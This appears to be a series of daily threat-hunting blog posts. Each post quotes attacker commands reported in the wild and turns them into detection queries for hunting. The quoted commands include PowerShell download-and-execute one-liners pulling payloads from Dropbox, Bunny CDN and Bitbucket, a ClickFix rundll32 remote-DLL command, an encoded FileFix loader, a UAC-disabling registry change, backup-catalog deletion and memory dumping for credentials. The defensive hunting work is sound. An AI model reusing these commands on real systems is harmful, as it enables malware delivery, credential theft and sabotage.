Know Your Adversary

Hello everyone! It's not always LSASS, in some cases adversaries may create full memory dumps and use it for accessing credentials. In this case , the adversary leveraged Microsoft Windows Resource Leak Diagnostic tool to obtain a memory dump: rdrleakdiag /p [REMOVED] /o CSIDL_PROFILE\downloads /fullmemdmp /wait 1 Let's build a query: event_type: "processcreatewin" AND proc_file_path: "rdrleakdiag.exe" AND cmdline: "fullmemdmp" See you tomorrow!

Hello everyone! It may be not very common, but some adversaries still use infected USB devices for malware distribution, so today we'll look at an example of  Replication Through Removable Media (T1091) . The example is Tangerine Turkey . The adversary leverages infected USB devices to distribute cryptocurrency-mining malware. So, the infection starts from executing a malicious VBScript from a USB drive: C:\WINDOWS\System32\WScript.exe E:\rootdir\x817994.vbs It means we can hunt for suspicious scripts executed from external drives, for example, D:\, E:\ and F:\.  Let's build the query: event_type: "processcreatewin" AND proc_file_path: "wscript.exe" AND cmdline: ("d\\\:" OR "e\\\:" OR "f\\\:") See you tomorrow!

Hello everyone! I think you already heard about a vulnerability in Microsoft's Windows Server Update Services (WSUS). Today we'll talk about  Exploit Public-Facing Application (T1190) and  CVE-2025-59287 . So, the vulnerability is already actively exploited ITW. According to this report , successful exploitation leads to spawning command and scripting interpreters from  wsusservice.exe and  w3wp.exe . Here we have the first part of our detection opportunities.  The first one: event_type: "processcreatewin" AND proc_file_path: ("cmd.exe" OR "powershell.exe") AND proc_p_file_path: "wsusservice.exe" The second: event_type: "processcreatewin" AND proc_file_path: ("cmd.exe" OR "powershell.exe") AND proc_p_file_path: "w3wp.exe" AND proc_p_cmdline: "wsuspool" Also, the adversary leveraged a PowerShell payload to exfiltrate data to a webhook.site endpoint. And this is another detection opportun...

Hello everyone! Let's talk about data exfiltration trends and ransomware. Modern ransomware attacks almost always involve this stage, so it's important to document tools they use to solve this task. According to this report , Qilin ransomware affiliates often abuse Cyberduck for data exfiltration. It's a legitimate open source file transfer client that enables adversary to connect to remote servers and cloud storage services to upload, download, and manage files. As always, we can build hunts based on executable's metadata, for example: event_type: "processcreatewin" AND proc_file_productname: "cyberduck" Also, we can look for resolving Cyberduck-related domains, for example: event_type: "dnsreqwin" AND dns_rname: "cyberduck.io" See you tomorrow!

Hello everyone! We talked about how adversaries masquarade malicious files a few times already, but let's look at another qurious case of COM Hijacking (T1546.015). By adding a malicious entry under HKCU that points a CLSID to their DLL, attackers cause normal system processes to load that malicious DLL. In this case, overrode the CLSID for twinapi.dll ( {AA509086-5Ca9-4C25-8F95-589D3C07B48A} ), forcing system processes and web browsers to load the attacker’s DLL. We can hunt for loading  twinapi.dll from uncommon locations: event_type: "imageloadwin" AND file_name: "twinapi.dll" AND NOT file_path: ("windows\\system32" OR "windows\\syswow64") See you tomorrow!

Hello everyone! Today we'll look at a curious example of  Deobfuscate/Decode Files or Information (T1140) , and learn how ransomware affiliates abuse Bulk Copy Program (BCP). The example is Trigona ransomware gang, which also uses Mimic ransomware in their campaigns. So, the adversary often targets MS-SQL Server instances and leverages bcp.exe to export the toolset to the compromised server, for example: bcp “select binaryTable from uGnzBdZbsi” queryout “C:\ProgramData\spd.exe” -T -f “C:\ProgramData\FODsOZKgAU.txt” bcp “select binaryTable from uGnzBdZbsi” queryout “C:\ProgramData\AD.exe” -T -f “C:\ProgramData\FODsOZKgAU.txt” bcp “select binaryTable from uGnzBdZbsi” queryout “C:\users\[username]\music\L.bat” -T -f “C:\users\[username]\music\FODsOZKgAU.txt” bcp “select binaryTable from uGnzBdZbsi” queryout “C:\users\[username]\music\pci2.exe” -T -f “C:\users\[users name]\music\FODsOZKgAU.txt” For example, we can hunt for bcp.exe exporting files to suspicious folders: event_ty...

Hello everyone! Let's look at another example of how financially motivated adversaries leverage legitimate web services to deliver malware. A financially-motivated threat cluster (tracked as UNC6229 ) based in Vietnam is using fake job postings to target workers in digital advertising and marketing.  The attackers post convincing job listings on legitimate job platforms and sometimes on domains they set up themselves. The adversary leveraged malcious LNK files, which abused PowerShell to download a payload from Dropbox: PowerShell -WindowStyle Hidden -Command "Iex (irm 'hxxps://xkc1ffaq1b.dl.dropboxusercontent[.]com/scl/fi/e/0?rlkey=5lf9n8l2v6xmqpmnmqltf3s38')" For example, we can hunt for PowerShell having Dropbox-related domains among command line arguments: event_type: "processcreatewin" AND proc_file_path: "powershell.exe" AND cmdline: *dropboxusercontent* See you tomorrow!

Hello everyone! It's not always PowerShell (T1059.001) or Windows Command Shell (T1059.003), more and more often adversaries use alternatives, for example, Python (T1059.006). Netskope discovered a new Python RAT that leverages the Telegram Bot API as a command and control (C2) channel. The RAT is executed via pythonw.exe : pythonw.exe C:\Users\User\AppData\Local\Temp\_MEI96282\telegrambt.py For example, we can hunt for pythonw.exe accessing api[.]telegram[.]org : event_type: "dnsreqwin" AND dns_rname: "api.telegram.org" AND proc_file_path: "pythonw.exe" See you tomorrow!

Hello everyone! Today we'll look at a few examples of behaviors related to  Caminho Loader , which employs Least Significant Bit (LSB) steganography to conceal .NET payloads within image files hosted on legitimate platforms. For example, according to the report , the adversary leveraged malicious JS files to download the second-stage script from paste[.]ee . We can transform it into a hunting query and look for wscript.exe attempts to connect to paste[.]ee : event_type: "dnsreqwin" AND dns_rname: "paste.ee" AND proc_file_path: "wscript.exe" The next stage, a heavily obfuscated PowerShell script, downloads a steganographic image file from archive[.]org . This behavior can also be easily transformed into a hunting query: event_type: "dnsreqwin" AND dns_rname: "archive.org" AND proc_file_path: "powershell.exe" Check the report for more detection and hunting opportunities! See you tomorrow!

Hello everyone! Adversaries always want to masquerade malicious files to look like legitimate. In some cases it may enable them to persist as well. Let's look at an example of  Hijack Execution Flow: DLL (T1574.001) . For example, adversaries may leverage phantom DLL hijacking by targeting references to non-existent DLL files.  Let's look at the report on  PassiveNeuron . The threat actors placed malicious DLLs under the following paths: C:\Windows\System32\wlbsctrl.dll C:\Windows\System32\TSMSISrv.dll C:\Windows\System32\oci.dll If present on the system, the first two DLLs are loaded into the svchost.exe process, the other one is loaded into msdtc.exe . For example, we can hunt for file creation events related to these DLLs: event_type: "filecreatewin" AND file_path: "windows\\system32" AND file_name: ("wlbsctrl.dll" OR "tsmsisrv.dll" OR "oci.dll") See you tomorrow!

Hello everyone! I noted a few times that one of my favorite threat hunting targets is rundll32.exe . And there's another interesting point about it - export functions. In many cases DLL export functions may be very interesting and suspicious, and may be worth to be documented. Let's look at an example -  NOROBOT . The adversary delivered it via ClickFix technique. The victim should have executed the following command: rundll32.exe \\inspectguarantee[.]org\check\iamnotarobot.dll,humanCheck As you can see, it has a very interesting export function name - " humanCheck ". Why not to use it to build a query? event_type: "processcreatewin" AND proc_file_path: "rundll32.exe" AND cmdline: "humancheck" See you tomorrow!

Hello everyone! As you know, adversaries may deliver malicious files to victims as uncompiled code. So today we'll look at an example of  Obfuscated Files or Information: Compile After Delivery (T1027.004) . According to the report ,  APT-Q-37 leveraged malicious XLAM files. The macro in the file decodes a copy of the backdoor source code data written in C# and saves it as C:\programdata\cayote.log . Then csc.exe is used to compile it as  C:\Programdata\USOShared\vlcplayer.dll : "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /r:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\System.Net.Http.dll" /target:library /out:C:\Programdata\USOShared\vlcplayer.dll "C:\Programdata\cayote.log" For example, we can look for suspicious csc.exe executions for compiling a DLL under ProgramData folder: event_type: "processcreatewin" AND proc_file_path: "csc.exe" AND cmdline: ("target:library" AND "programdata") See you t...

Hello everyone! Today we'll look at  PhantomVAI Loader, and various related behavior markers we can transform into hunting queries. Let's start from the delivery stage. The adversary distributed archives with malicious JS or VBS files via spear phishing emails. We can hunt for wscript.exe executing files from folders related to user downloads, for example: event_type: "processcreatewin" AND proc_file_path: "wscript.exe" AND cmdline: ("downloads" OR "content.outlook") It executes the following PowerShell command to download the next stage: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -w hidden -c "$disjoined = '[redacted]' -replace '','';$isogonism = [System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($disjoined));Invoke-Expression $isogonism;" Here, for example, we can look for decoding: event_type: "processcreatewin" AND proc_file_path: "pow...

Hello everyone! Today we'll look how adversaries abuse Microsoft Console Debugger, and how it may help you during threat identification phase. And we'll look at  Jewelbug . This threat actor is known to use this utility for quite some time, and as it's not very popular among adversaries, it may also help you to identify the group. It's also interesting that the adversary uses a renamed version of the tool, for example: CSIDL_PROFILE\public\downloads\7zup.exe -d -remote up The tool can be used to run shellcode, executables, DLLs, or terminate security solutions. For example, we can hunt for renamed executables: event_type: "processcreatewin" AND proc_file_originalfilename: "cdb.exe" AND NOT proc_file_path: "cdb.exe" See you tomorrow!

Hello everyone! Let's focus on Defense Evasion tactic today, and look at the following sub-technique -  Execution Guardrails: Mutual Exclusion (T1480.002) . According to this report , StealthStealer runs the following PowerShell command to determine whether an instance with the same name is already running by checking a mutex: cmd /C "powershell -Command \"$mutex = New-Object System.Threading.Mutex($false, 'Global\d170db549434063c1ef596e29256736216a1013f86088454b97ce25857d93247'); if($mutex.WaitOne(0)) { exit 0 } else { exit 1 }\"" As always, we can search for similar behavior markers: event_type: "processcreatewin" AND proc_file_path: "powershell.exe" AND cmdline: "system.threading.mutex" See you tomorrow!

Hello everyone! We already talked about interesting staging folders, but today we look at another similar thing we can use for hunting -  Masquerading: Match Legitimate Resource Name or Location (T1036.005) . As always, let's start from an example . The adversary leveraged PowerShell scripts to download and run malicious files. For example, such file were saved under the following names and locations: C:\ProgramData\Intel\ping.exe C:\Users\Public\ping.exe As you can see, the threat actors masqueraded malicious files to look like ping utility. You can document such cases and use it both for detection or hunting, for example: event_type: "processcreatewin" AND proc_file_path: "ping.exe" AND NOT proc_file_path: ("windows\\system32" OR "windows\\syswow64") See you tomorrow!

 Hello everyone! ClickFix, FileFix... We see it every day. But what does it mean from detection perspective? Let's look at an example . FileFix. The victim should paste the following command: PowerShell -noP -W H -ep Bypass -C "$if=[System.IO.File];$ifr=$if::ReadAllBytes;$ifw=$if::WriteAllBytes;$e=[System.Text.Encoding]::UTF8;$c=[System.Convert];$egb=$e.GetBytes;$egs=$e.GetString;$cf=$c::FromBase64String;$ct=$c::ToBase64String;$u='hxxps[://]bitbucket[.]org/pibejiloiza/pi73/raw/4e2ff4d859e04af8d01fd961ab56163736a731f9/pexels-willianmatiola-33593998-3[.]jpg';$egs.Invoke($cf.Invoke('JHBfZmlzdD0tam9pbigkZW52OlRFTVAsJ1x6ZDc0NmYxY2UxYzAuanBnJyk7SW52b2tlLVdlYlJlcXVlc3QgLVVyaSAkdSAtTWV0aG9kIEdldCAtT3V0RmlsZSAkcF9maXN0IC1FcnJvckFjdGlvbiBJZ25vcmU7CiRpbWFnZV9ieXRlcz0kaWZyLkludm9rZSgkcF9maXN0KTskcF9ieXRlcz0kaW1hZ2VfYnl0ZXNbMTEwMTI1My4uKCRpbWFnZV9ieXRlcy5MZW5ndGgtMSldOyRlLkdldFN0cmluZygkcF9ieXRlcyl8aWV4Ow=='))|iex;$z=' C:\\Users\\Default\\Documents\\Meta\\Facebook\\Shar...

Hello everyone! Yes, one more legitimate web service is used by adversaries to store malicious files. But it's always a detection or hunting opportunity for us! So, according to this report , the adversary used a malicious PowerShell script to download a TXT file from dpaste[.]com .  We can easily translate this behavior to a hunting query: event_type: "dnsreqwin" AND dns_rname: "dpaste.com" AND proc_file_path: "powershell.exe" See you tomorrow!

Hello everyone! I know you got a bit tired of legitimate services abuse, but it's always a great target for threat hunting, so it's important to document it and add to your library. This time we'll look how  Astaroth leveraged GitHub for storing configuration. What's more, it's stored inside an image, for example: hxxps://raw.githubusercontent[.]com//dridex2024//razeronline//refs/heads/main/razerlimpa[.]png So, we can look for suspicious processes accessing raw.githubusercontent[.]com . For example, in this case the payload was injected into  RegSvc.exe process: event_type: "dnsreqwin" AND dns_rname: "raw.githubusercontent.com" AND proc_file_path: "RegSvc.exe" See you tomorrow!

Hello everyone! Adversaries often hide command and scripting interpreter's windows to use such tools silently. Today we'll look at a creative way of implementing  Hide Artifacts: Hidden Window (T1564.003) . Let's look at Stealit . To hide PowerShell window the malware leverages the folowing command: "powershell.exe -NoProfile -Command " Add-Type -Name Window -Namespace Console -MemberDefinition ' [DllImport(\"Kernel32.dll\")] public static extern IntPtr GetConsoleWindow(); [DllImport(\"user32.dll\")] public static extern bool ShowWindow(IntPtr hWnd, Int32 nCmdShow); '; $consolePtr = [Console.Window]::GetConsoleWindow(); [Console.Window]::ShowWindow($consolePtr, 0); "" Interesting, right? And definitely worth a query: event_type: "processcreatewin" AND proc_file_path: "powershell.exe" AND cmdline: ("GetConsoleWindow" AND "ShowWindow") See you tomorrow!

Hello everyone! How often do you see adversaries leverage  Spearphishing via Service (T1566.003) ? Not very often, right? So let's look at an example. We'll look into a report on WhatsApp Worm. Yes, the threat actors distributed malicious files, in this case ZIP archives with LNK, via WhatsApp. The LNK file contained an obfuscated command to download and run the second stage. Let's look how this stage disables UAC. The following command is used to achieve this goal: powershell -WindowStyle Hidden -ArgumentList "-Command Set-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System' -Name 'EnableLUA' -Value 0 -Force" Such activity is quite suspicious and definitely worth a query: event_type: "registryvaluesetwin" AND reg_key_path: "enablelua" AND reg_value_data: "0x00000000" See you tomorrow!

Hello everyone! Today we'll look at an example of  Inhibit System Recovery (T1490) , and how adversaries abuse wbadmin. And no, not for deleting shadow copies. Let's look at Chaos ransomware behaviors. It uses vssadmin and wmic to remove shadow copies, bcdedit to change recovery settings, and wbadmin to delete the backup catalog: wbadmin delete catalog -quiet Of course, you can look for such suspicious activity: event_type: "processcreatewin" AND proc_file_path: "wbadmin.exe" AND cmdline: ("delete" AND "catalog") See you tomorrow!

Hello everyone! Unfortunately, RMMs are still a very common tool in adversary's hands. Of course, some are very common and easy detectable, but others... Let's look at an example. According to Huntress report , an adversary leveraged Nezha agent. It's a a lightweight, open-source server monitoring and task management tool that is freely available. Despite the fact the agent doesn't seem to have interesting command line arguments or metadata, but we always may look inside to extract any notable strings to write YARA rules, for example. For such legitimate tools usually it's not very difficult. Of course, this binary contains some interesting strings, for example: nezhahq NezhaServiceClient Another good candidate for hunting, right? See you tomorrow!

Hello everyone! We talked about how adversaries abuse various legitimate services to distribute malware multiple times already. But let's look at another example. According to this report , the adversary leveraged malicious LNK file to launch a hidden PowerShell command that downloads a lure PDF and another ZIP file from the Bunny CDN URL: powershell -WindowStyle Hidden -ExecutionPolicy Bypass -Command "try { iwr 'hxxps://555555cnd.b-cdn[.]net/Marriott_Marketing_Job_Description.pdf' -OutFile 'C:\Users\Public\Marriott.pdf'; Start-Process 'C:\Users\Public\Marriott.pdf'; Start-Sleep -Seconds 3; iwr 'hxxps://555555cnd.b-cdn[.]net/002.zip' -OutFile 'C:\Users\Public\002.zip'; Expand-Archive -Path 'C:\Users\Public\002.zip' -DestinationPath 'C:\Users\Public' -Force; Start-Process 'C:\Users\Public\XtraViewer.exe' -ArgumentList '/silent_start' } catch {}" Despite the fact the command is quite common and can be ...

Hello everyone! We already looked how to use parts of URLs in our threat hunting missions, let's look at another similar artefact - TLDs. In some cases adversaries use quite exotic TLDs for their infrastructure. Let's look at a recent example related to Rhadamanthys (yes, again). Most of the domains have quite suspicious TLDs, for example: cloud341[.]autos cloud341[.]baby cloud341[.]icu cloud341[.]lol cloud341[.]monster cloud34221[.]hair cloud34221[.]homes cloud34221[.]quest cloud343[.]boats cloud9342[.]beauty Worth a hunting query, right? event_type: "dnsreqwin" AND dns_rname: (*.autos OR *.baby OR *.icu OR *.lol OR *.monster OR *.hair OR *.homes OR *.quest OR *.boats OR *.beauty) See you tomorrow!

Hello everyone! I love when adversaries leverage uncommon file types in their spear phishing campaigns. And I spotted another interesting example today, this time its a PPSX file. According to the report ,  The Confucius group used such files phishing email campaign targeted users in Pakistan. A PPSX file is a PowerPoint Show file created by Microsoft PowerPoint (or compatible programs like LibreOffice Impress or Google Slides). It’s a special type of PowerPoint file that opens directly in slideshow mode rather than in edit mode. It's not very common, so it may be a good idea to hunt for any suspicious files with this extension: event_type: "processcreatewin" AND proc_file_path: "powerpnt.exe" AND cmdline: *ppsx See you tomorrow!

Hello everyone! Adverasries keep experimenting with file types they use for phishing. And this time we'll look at  UAC-0245 and XLL files. According to the report , the adversary leverarage malicious XLL files to deliver CABINETRAT . Such files had some very interesting behaviors. For example, the file created another XLL file in  "%APPDATA%\Microsoft\Excel\XLSTART\" enabling the adversary to use  Office Template Macros (T1137.001) for persistence. First of all, we can hunt for any suspicious XLL files: event_type: "processcreatewin" AND cmdline: *.xll Another detection opportunity is to look for suspicious XLL file creation events related to XLSTART folder: event_type: "filecreatewin" AND file_path: "xlstart" AND file_extension: "xll" See you tomorrow!

Hello everyone! Today we'll talk about another interesting example of a legitimate web service, which is misused by threat actors as a C2 channel. This time it's a free request logging service. According to Proofpoint report , TA415 leveraged  requestrepo[.]com in order to exfiltrate collected system information as well as the VS Code Remote Tunnel verification code.  The threat actors used  WhirlCoil - a Python loader, which was executed via via pythonw.exe. We can use both facts to build a hunting query: event_type: "dnsreqwin" AND dns_rname: "requestrepo.com" AND proc_file_path: "pythonw.exe" See you tomorrow!

Hello everyone! Let's talk about another uncommon technique -  Server Software Component: IIS Components (T1505.004) , and how to hunt for installation of suspicious modules. According to the report ,  UAT-8099 leveraged appcmd.exe to install and uninstall IIS modules: c:\windows\System32\inetsrv\appcmd.exe uninstall module /module.name:HttpFastCgiModule c:\windows\SysWOW64\inetsrv\appcmd.exe install module /name:HttpCgiModule /image:%windir%\SysWOW64\inetsrv\HttpCgiModule.dll /preCondition:bitness32 This behavior can be transformed into a hunting query: event_type: "processcreatewin" AND proc_file_path: "appcmd.exe" AND cmdline: ("module" AND ("install" OR "uninstall")) See you tomorrow!

Hello everyone! How often do you use proxy logs for threat hunting? I hope often enough as C2 communications may involve accessing quite interesting URLs. Let's look at a few examples! The first one is related to an activity cluster we track as Watch Wolf . If you look at the example, you can see that the malware accesses the following URL: hxxps://4ad74aab[.]cfd/index.php Of course, even the domain itself is quite suspicious, including the TLD, but the URL also contains " index.php ", so we can use both to create a hunting query. Another example - Rhadamanthys . And another suspicious URL, of course: hxxps://193.84.71[.]81/gateway/wcm6paht.htbq1 Here we also have an interesting part for building a hunting query - " gateway ".  See you tomorrow!

Hello everyone! I hope you've already checked Unit42's report on  Phantom Taurus . And today we'll look at how this cluster abused Exchange Management Shell for email collection. According to the first report on Phantom Taurus, the adversary leveraged Exchange Management Shell ( exshell.psc1 ) to collect selected emails and save them to CSV: powershell.exe -psconsolefile "C:\Program files\microsoft\exchange server\v15\bin\exshell.psc1" -command "get-mailbox -Filter \"UserPrincipalName -Like \"*foreign*\"\" -ResultSize Unlimited | get-mailboxstatistics | sort-object TotalItemSize -Descending | Select-Object DisplayName,Alias,TotalItemSize -First 30 | export-csv c:\users\public\<redacted>\<redacted>.csv" powershell.exe -psconsolefile "C:\Program files\microsoft\exchange server\v15\bin\exshell.psc1" -command "Get-MessageTrackingLog -ResultSize Unlimited | Where-Object {$_.Recipients -like \"*@<redacte...